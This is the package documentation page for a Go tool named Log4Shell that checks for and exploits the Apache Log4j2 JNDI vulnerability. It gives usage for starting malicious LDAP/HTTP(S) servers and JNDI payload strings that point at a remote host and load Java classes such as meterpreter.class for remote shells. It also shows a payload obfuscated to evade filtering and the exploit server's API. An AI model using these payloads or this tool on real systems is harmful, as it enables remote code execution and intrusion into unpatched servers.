log4shell

package module
v1.0.1 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Dec 18, 2021 License: GPL-3.0 Imports: 16 Imported by: 0

README

Log4Shell

  • Check, exploit, obfuscate, TLS, ACME in one Go program.
  • You don't need to install anything except develop it.

Usage

Start LDAP and HTTP server
  • Log4Shell.exe -host "1.1.1.1"
  • Log4Shell.exe -host "example.com"
Start LDAPS and HTTPS server
  • Log4Shell.exe -host "example.com" -tls-server -tls-cert "cert.pem" -tls-key "key.pem"
  • Log4Shell.exe -host "1.1.1.1" -tls-server -tls-cert "cert.pem" -tls-key "key.pem" (need IP SANs)
Start LDAPS and HTTPS server with ACME
  • Log4Shell.exe -host "example.com" -auto-cert (must use domain name)
Obfuscate malicious(payload) string
Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/calc.class}"

raw: ${jndi:ldap://1.1.1.1:3890/calc.class}
${${lhnK:JFL3Nl:-j}n${Yx6-A3NuXSY1nI-g38C4MN-WAFx:-d}i:${2O:bO2I5l:-l}${yeZ6-mnrv6pb:gB49n:XrYMP:-d}
${jVBMSs-iOFWslRG-XuNO:dsCO:-a}${jYYNn:Twh80-IYXK:-p:/}${eOFbh:DW35u2:-/1.}${EkFw3Z-YsM9CIMV8:g2DHZ:
-1}${Vez8Sb:Mwn:-}${yWH0V-FY9jJQZ2:TOSkrotU:oq1i:-}${kZ:BoJpOxRH-yFI2POt-88w2:-.1}${xbswX-VstKzXnyNz
i8:jeEQKB5WRH-Ob:-}${Uyhe0-aYuAh-MdR63to:GONgfM:-.}${eA:eCPgpV-NWF7s:-}${mrLla-owJSvkD:n0cmdQ-V2cLx:
-1:3}${CwG9:Hc:-}${xT:aiD7ho:xz:-8}90${NTSL-dSfw9NC:7OiGEp:gMQwko:-}/${TCpW:UhZI0IO8:9Jz5MH:WyM:-c}$
{Mlv:AS8TOFMM-b9I2:FqvBY:-al}${mfGW:EY1Yd48:E0KhRGfp:5CBsuC:-c}${xDw1-ZyHav9K:jPHo18i:zibmI:-.}c${ye
-kZjRa5g61cm-Hn2yR7:-la}${Htg:cySA:-s}s}

Check

  • start Log4Shell server
  • put your class file to the payload directory
  • send ${jndi:ldap://1.1.1.1:3890/nop.class}
  • send ${jndi:ldaps://example.com:3890/nop.class} with TLS

Exploit

  • start Log4Shell server
  • put your class file to the payload directory
  • send ${jndi:ldap://1.1.1.1:3890/meterpreter.class}
  • send ${jndi:ldaps://example.com:3890/meterpreter.class} with TLS
  • meterpreter will open source after some time

VulApp

  • VulApp is a vulnerable Java program that use log4j2 package.
  • You can use it for develop this project easily.
  • java -jar vulapp.jar ${jndi:ldap://127.0.0.1:3890/calc.class}

Help

:::      ::::::::   ::::::::      :::     ::::::::  :::    ::: :::::::::: :::      :::
:+:     :+:    :+: :+:    :+:    :+:     :+:    :+: :+:    :+: :+:        :+:      :+:
+:+     +:+    +:+ +:+          +:+ +:+  +:+        +:+    +:+ +:+        +:+      +:+
+#+     +#+    +:+ :#:         +#+  +:+  +#++:++#++ +#++:++#++ +#++:++#   +#+      +#+
+#+     +#+    +#+ +#+   +#+# +#+#+#+#+#+       +#+ +#+    +#+ +#+        +#+      +#+
#+#     #+#    #+# #+#    #+#       #+#  #+#    #+# #+#    #+# #+#        #+#      #+#
######## ########   ########        ###   ########  ###    ### ########## ######## ########

                                                      https://github.com/For-ACGN/Log4Shell

Usage of Log4Shell.exe:
-auto-cert
      use ACME client to sign certificate
-host string
      server IP address or domain name (default "127.0.0.1")
-http-addr string
      http server address (default ":8080")
-http-net string
      http server network (default "tcp")
-ldap-addr string
      ldap server address (default ":3890")
-ldap-net string
      ldap server network (default "tcp")
-obf string
      obfuscate malicious(payload) string
-payload string
      payload(java class) directory (default "payload")
-tls-cert string
      tls certificate file path (default "cert.pem")
-tls-key string
      tls private key file path (default "key.pem")
-tls-server
      enable ldaps and https server

Screenshot

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func Obfuscate 

func Obfuscate(raw string) string

Obfuscate is used to obfuscate malicious(payload) string like ${jndi:ldap://127.0.0.1:3890/calc.class} for log4j2 package.

Types

type Config 

type Config struct {
	LogOut io.Writer

	// Hostname can be set IP address or domain name,
	// If enable AutoCert, must set domain name.
	Hostname string

	// PayloadDir contains Java class files.
	PayloadDir string

	// about servers network and address.
	HTTPNetwork string
	HTTPAddress string
	LDAPNetwork string
	LDAPAddress string

	// AutoCert is used to ACME client to sign
	// certificate automatically, don't need to
	// set EnableTLS true again.
	AutoCert bool

	// EnableTLS is used to enable ldaps and
	// https server, must set TLS certificate.
	EnableTLS bool

	// TLSCert is used to for ldaps and https.
	TLSCert tls.Certificate
}

Config contains configurations about log4shell server.

type Server 

type Server struct {
	// contains filtered or unexported fields
}

Server is used to create an exploit server that contain a http server and ldap server(can wrap tls), it used to check and exploit Apache Log4j2 vulnerability easily.

func New 

func New(cfg *Config) (*Server, error)

New is used to create a new log4shell server.

func (*Server) Secret 

func (srv *Server) Secret() string

Secret is used to get the generated secret about url.

func (*Server) Start 

func (srv *Server) Start() error

Start is used to start log4shell server.

func (*Server) Stop 

func (srv *Server) Stop() error

Stop is used to stop log4shell server.

Source Files

View all Source files

Directories

Path Synopsis

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.